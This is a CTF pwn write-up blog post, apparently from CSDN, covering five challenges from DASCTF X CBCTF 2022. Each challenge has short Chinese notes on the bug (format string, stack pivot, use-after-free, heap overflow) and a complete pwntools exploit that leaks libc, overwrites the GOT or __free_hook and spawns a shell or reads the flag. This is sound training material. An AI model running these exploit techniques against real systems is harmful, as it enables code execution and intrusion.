DASCTF X CBCTF 2022九月挑战赛-Pwn

最新推荐文章于 2024-07-12 19:06:42 发布
最新推荐文章于 2024-07-12 19:06:42 发布
阅读量576 收藏 2
点赞数 2
分类专栏: pwn入门 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34010404/article/details/126938206
版权

DASCTF X CBCTF 2022九月挑战赛-Pwn

cyberprinter

buf 后面跟着一个libc的地址,可以leak libc 的基址

下面跟着一个格式串漏洞,puts里面调用的strlen,改那个got为one_gadget 即可(这个题刚好有一个满足的gadget)

exp:

from pwn import*

def fmt_payload(qword_of_rsp_fmt,list_data,wide='$hhn'):
    
    _len = len(list_data)
    arg_start = 5 + qword_of_rsp_fmt + 1
    
    bits = 8

    if wide == '$hhn':
        bits = 8
    if wide == '$hn':
        bits = 16
    if wide == '$n':
        bits = 32
    if wide == '$ln':
        bits = 64
    
    mask = 0x0
    for i in range(bits):
        mask = (mask<<1)|1
    
    parts = []      #(addr,val)
    #save to list
    for i in range(_len):
        size = list_data[i][2]
        value = list_data[i][1]
        addr = list_data[i][0]
        
        c = size//(bits//8)
        if c == 0:
        	c = 1
        
        for j in range(c):
            part_addr = addr + j * (bits//8)
            part_val = (value>>(j * bits)) & mask
            parts.append((part_addr,part_val))

    #sort by val 

    for i in range(len(parts)):
        for j in range(i+1,len(parts)):
            if(parts[j][1]<parts[i][1]):
                tmp = parts[i]
                parts[i] = parts[j]
                parts[j] = tmp

    #generate fmt payload
    payload = b''
    fmt_string_len = 0
    generate_success = False

    while False == generate_success:
        inc_len = False
        payload = b''

        for i in range(len(parts)):
            if i==0:
                if parts[0][1] != 0:
                    payload += b'%%%dc'%(parts[0][1])
            else:
                if (parts[i][1]-parts[i-1][1]) != 0:
                    payload += b'%%%dc'%(parts[i][1] - parts[i-1][1])

            tmp = payload + b'%' + str(i + arg_start + fmt_string_len//8).encode() + wide.encode()
            
            if len(tmp) >= fmt_string_len:
                fmt_string_len += 8
                inc_len = True   
                break
            else:
                payload += b'%' + str(i + arg_start + fmt_string_len//8).encode() + wide.encode()
        if inc_len == False:
            generate_success = True
    payload = payload.ljust(fmt_string_len,b'\x00')
    print(parts)

    for i in range(len(parts)):
         payload += p64(parts[i][0])

    return payload

'''
Usage:
'''

if __name__ == 'main':
    sh = process('./a.out')
    sh.recvuntil(b'gift:')

    stack = int(sh.recvline()[:-1],16)
    ret_addr = stack + 0x1010 + 0x8
    rbp = stack + 0x1010

    payload = fmt_payload(0,[(ret_addr,0x7fff12345678,8),(rbp,0x123412341234,8)],wide='$hn')
    print(payload)

    gdb.attach(sh)
    sleep(1)
    sh.send(payload)
    sh.interactive()

from pwn import*
import fmt_payload

#p = process('./pwn')
libc = ELF('/home/sb/Desktop/glibc-all-in-one-master/libs/2.31-0ubuntu9_amd64/libc.so.6')

p = remote('node4.buuoj.cn',28055)

p.send(b'a'*24)
p.recvuntil(b'Hello ' + b'a' * 24)

libc_base = u64(p.recv(6).ljust(8,b'\x00')) - libc.symbols['_IO_2_1_stderr_']

log.success('libc_base: ' + hex(libc_base))

hook = libc_base + 0x7f557fde3f68 - 0x7f557fbc1000
arg = libc_base + 0x7f557fde3968 - 0x7f557fbc1000

log.success('hook:' + hex(hook))
log.success('arg: ' + hex(arg))

got = 0x7f10db90c0a8 - 0x7f10db721000 + libc_base

one_gadget = libc_base + 0xe6af1
payload = fmt_payload.fmt_payload(2,[(got, one_gadget,6)],wide='$hhn')
#payload = fmt_payload.fmt_payload(2,[(hook,libc_base + libc.symbols['system'],6),(arg,u32(b'sh\x00\x00'),4)],wide='$hn')
print(payload)
print(len(payload))

#gdb.attach(p)
#pause()
p.sendlineafter(b'do sth\n',payload)

p.interactive()

appetizer

栈溢出,但是只能覆盖返回地址,栈迁移做就行

from pwn import*

#p = process('./pwn')
p = remote('node4.buuoj.cn',26940)
elf = ELF('./pwn')
libc = ELF('./libc-2.31.so')

#libc = ELF('/home/sb/Desktop/glibc-all-in-one-master/libs/2.31-0ubuntu9_amd64/libc-2.31.so')
#gdb.attach(p)
#pause()
p.sendafter(b'Welcome to CBCTF!\n',b'aa' + p64(0x7373656C656D614E))

p.recvuntil(b'Here you are:')
elf_base = int(p.recvline()[:-1],16) - 0x4050
log.success('elf_base:' + hex(elf_base))

pop_rdi = elf_base + 0x00000000000014d3
leave = elf_base + 0x00000000000012d8

read_gadget = elf_base + 0x1428 
fake_stack = elf_base + 0x4050

#p.sendafter(b'wish:\n',p64(fake_stack + 16 * 8) + p64(leave))

rop = b''
rop += p64(0) * 16

rop += p64(fake_stack + 256)               #rbp
rop += p64(pop_rdi)
rop += p64(elf_base + elf.got['puts'])
rop += p64(elf_base + elf.plt['puts'])
rop += p64(read_gadget)

p.sendafter(b'on it\n',rop)

p.sendafter(b'wish:\n',p64(fake_stack + 16 * 8) + p64(leave))

libc_base = u64(p.recvline()[:-1].ljust(8,b'\x00')) - libc.symbols['puts']
log.success('libc_base:' + hex(libc_base))

pop_rsi = libc_base + 0x0000000000027529
pop_rdx = libc_base + 0x000000000011c1e1  #: pop rdx ; pop r12 ; ret

rop = b''

orw = '''
mov rax,0x67616c66
push rax
mov rdi,rsp
xor rsi,rsi

mov rax,2
syscall

mov rdi,rax
mov rsi,rsp
mov rdx,0x30

xor rax,rax
syscall

mov rdi,1
mov rax,1
syscall

'''
context.arch ='amd64'

rop += asm(orw).ljust(160,b'\x00')

rop += p64(pop_rdi)
rop += p64(fake_stack & 0xfffffffffffff000)
rop += p64(pop_rsi)
rop += p64(0x1000)

rop += p64(pop_rdx)
rop += p64(0x7)
rop += p64(0)

rop += p64(libc_base + libc.symbols['mprotect'])

rop += p64(fake_stack)

print(len(rop))

p.send(rop)
print(p.recv())

bar

UAF 可以改fd (加或减去一个偏移)

from pwn import*

p = process('./pwn')
p = remote('node4.buuoj.cn',27713)
libc = ELF('./libc-2.31.so')

choice = lambda x:p.sendlineafter(b'Your choice:',str(x).encode())

# 2,1,0
#0x40,0x50,0x100

def add(size,payload):
    choice(1)
    p.recvuntil(b'Vodka?')
    p.sendline(str(size).encode())
    p.send(payload)
    pass    

def drink(idx,count):
    choice(2)
    p.sendlineafter(b'Which?',str(idx).encode())
    p.sendlineafter(b'How much?',str(count).encode())

    pass

def leak_libc():
    choice(3)
    p.recvuntil(b'icecream!\n')
    libc_base = int(p.recvline()[:-1],16) - libc.symbols['_IO_2_1_stdout_']
    return libc_base

libc_base = leak_libc()
log.success('libc_base:' + hex(libc_base))

hook = libc_base + 0x7f75e103df68 - 0x7f75e0e1b000
arg = libc_base + 0x7f75e103d968 - 0x7f75e0e1b000

log.success('hook:' + hex(hook))
log.success('arg:' + hex(arg))

add(2,b'aaa')
add(2,b'aaa')
add(2,b'aaa')
add(2,b'aaa')

add(1,b'aaa')
add(1,b'aaa')
add(1,b'aaa')
add(1,b'aaa')

##-->tcache bin
#write system->lock
drink(0,64)
drink(1,64)

drink(4,80)
drink(5,80)

#modify fd by drink
drink(1,-400)
add(2,b'aaa')

add(2,p64(hook - 0x10))

add(1,b'aa')

add(1,p64(libc_base+libc.symbols['system']))
drink(11,79)
################
#write /bin/sh
drink(2,64)
drink(3,64)

drink(6,80)
drink(7,80)
##
drink(3,-432)
add(2,b'aaa')
add(2,p64(arg - 0x18))
add(1,b'aa')
add(1,p64(1) + b'/bin/sh\x00')
drink(11,79)

#gdb.attach(p)
p.interactive()

ez_note

一开始没看出来,改了下数据类型才看出来,只是个简单的堆溢出

from pwn import*

#p = process('./pwn')
p = remote('node4.buuoj.cn',29789)
libc = ELF('./libc-2.31.so')
#libc = ELF('/home/sb/Desktop/glibc-all-in-one-master/libs/2.31-0ubuntu9_amd64/libc-2.31.so')
choice = lambda x:p.sendlineafter(b'Your choice:',str(x).encode())
def add(size,payload):
    choice(1)
    size = 0x100000000 | size
    p.sendafter(b'Note size:',str(size).encode())
    p.sendafter(b'Note content:',payload)

def free(idx):
    choice(2)
    p.sendlineafter(b'Note ID:',str(idx).encode())

def show(idx):
    choice(3)
    p.sendlineafter(b'Note ID:',str(idx).encode())

##
context.log_level = 'debug'
add(0x80,b'aaaaaa')

for i in range(5):
    add(0x110,b'a')

add(0x90,b'a')
free(0)

payload = b'a' * 0x80 + p64(0) + p64(0x5a1)
add(0x80,payload)

free(1)
add(0x110,b'a') #1
#leak libc
show(2)
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x1ebbe0
log.success('libc_base' + hex(libc_base))

##

free(5)
free(4)
add(0x220,b'aaa')

add(0x80,p64(0) + p64(0x121) + p64(libc_base + libc.symbols['__free_hook']))

add(0x110,b'/bin/sh\x00')
add(0x110,p64(libc_base + libc.symbols['system']))

free(7)
p.interactive()

cgrasstring

resize实际上和realloc 差不多,这里返回的指针是可能改变的,但是ptrArray里面任然保存的是旧的ptr,UAF

from pwn import*

#p = process('./pwn')
p = remote('node4.buuoj.cn',26012)
libc = ELF('/home/sb/Desktop/glibc-all-in-one-master/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')
#libc = ELF('./libc-2.27.so')
choice = lambda x:p.sendlineafter(b'choice:',str(x).encode())

def add(size,string):
    choice(1)
    p.sendlineafter(b'size:',str(size).encode())
    p.sendafter(b'content:',string)

def edit(idx,size,string):
    choice(2)
    p.sendlineafter(b'idx',str(idx).encode())
    p.sendlineafter(b'size',str(size).encode())
    p.sendafter(b'content',string)

def show(idx):
    choice(3)
    p.sendlineafter(b'idx',str(idx).encode())

for i in range(10):
    add(0x80,b'/bin/sh')
for i in range(6):
    edit(i,256,b'a')

#edit(6,256,b'a')

edit(6,256,b'\xa0')
show(6)
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - (0x7efe5e12dca0 - 0x7efe5dd42000) 

log.success('libc_base:' + hex(libc_base))
edit(5,256,p64(libc_base + libc.symbols['__free_hook']))
add(0x80,p64(libc_base + libc.symbols['system']))

p.interactive()

(给的libc怎么和远程的不一样???nmd)

Suspend.
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
DASCTF X CBCTF 2022九月挑战赛 bar wp
qq_65147345的博客
10-03 190
思路: 1. 通过漏洞改写fd打tcache attack
DASCTF X CBCTF 2022九月挑战赛 cyberprinter wp
qq_65147345的博客
10-02 340
通过格式化字符串漏洞改写libc中strlen的got表地址为one_gadget
DASCTF X CBCTF 2022九月挑战赛 WriteUp
Whitebird的博客
10-24 540
DASCTF X CBCTF 2022九月挑战赛 WriteUp
DASCTF X CBCTF 2022九月挑战赛 学习记录
m0_64815693的博客
09-23 1889
学习记录
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
FUCKING12的博客
10-06 1884
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
4、Linux入门学习笔记 文件操作命令
m0_38075171的博客
11-04 158
4、Linux入门学习笔记 文件操作命令 文件操作命令 touch命令:生成新文件命令 cat命令:查看文件内容命令 把cat命令反写成tac命令 可以把文件内容反向输出显示 more命令:查看内容较多的文件可以进行翻页的命令 正序翻页,从上往下;不可向上翻页;默认显示10行 less命令:同more命令,支持向上翻页 当默认10行时倒序翻页,从下往上,当指定行数时,从上往下;可向上翻页;默认显示10行 head命令:显示文件前面的前几行命令 tail命令:与head相反的命令 ...
格式化字符串漏洞
qq_52126646的博客
03-04 3403
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
DASCTF X CBCTF 2022九月挑战赛 reverse landing
weixin_63051469的博客
09-22 667
胡小楠的刷题日常
2021DASCTF July X CBCTF--cat flag
qq_46263951的博客
08-02 385
很难受啊,比赛的时候根据提示猜到flag的文件名肯定在日志文件中,但不知道日志文件在哪里... 进去后直接给出一段php代码 <?php if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; if (!preg_match('/flag/i',$cmd)) { $cmd = escapeshellarg($cmd); system('cat ' . $cmd); } } else { .
2021DASCTF July X CBCTF 4th(wp)
qq_50589021的博客
08-25 823
CRYPTO Yusa的密码学签到——BlockTrick nc连接以后出来哪个就复制哪个,最后得到flag WEB ezrce 此题属于是YAPI接口管理平台RCE,利用csdn上找到的exp可以直接打: YAPI接口管理平台RCE复现-附exp cat flag 这个题目有点脑洞了 首先是访问/var/log/nginx/aeecss.log 得知真正的flag文件 然后写了一个ascii的不可见字符的fuzz字典生成脚本: <?php $myfile = fopen("ascii.txt"
【pwn】未知libc版本利用的一个蠢方法
Nothing
08-17 1398
前几天看了一道题,题目本身还是比较常规的,这题的预期解法是通过_dl_runtime_resolve来做的。但我就是想用栈溢出+栈迁移碰一碰,整了半天就差onegadget地址了,查了一下libc search发现找不到对应的版本,可能出题人就是想用一个比较偏的libc版本把这条路封死,但我最后还是硬怼出来了。以后如果遇到了数据库中找不到对应的libc版本的时候可以尝试一下这种方法(当然ctf题中一般不会出个很偏的libc版本)。 条件:1.libc中的一个任意地址(通过泄露got表就可得到)。2.可以通过
LitCTF PWN题解
ctfpwn的博客
06-02 516
接下来就是正常的64位ret2libc过程,找一个pop寄存器和ret地址,用这条指令:ROPgadget --binary pwn --only 'pop|ret'看看c伪代码,很容易看出是ret2libc题,并且对read读入的数据有一个strlen的判断,如果大于0x50就跳出。直接nc之后ls查看一下目录,看到一个dockerfile,cat一下就能发现打开flag文件的方式。然后通过给的libc文件计算偏移,得到system函数和/bin/sh字符串的地址。咳咳,接下来是正题。
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6543
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
【持续集成_05课_Linux部署SonarQube及结合开发项目部署】
最新发布
weixin_42333261的博客
07-12 294
前置条件:sonarQube不能使用root账号进行启动,所以需要创建普通用户及。3)CMD上传qube文件-不能传到home路径下哦。2)添加用户、组名、密码。4)检查并解压上传的包。
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Suspend.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值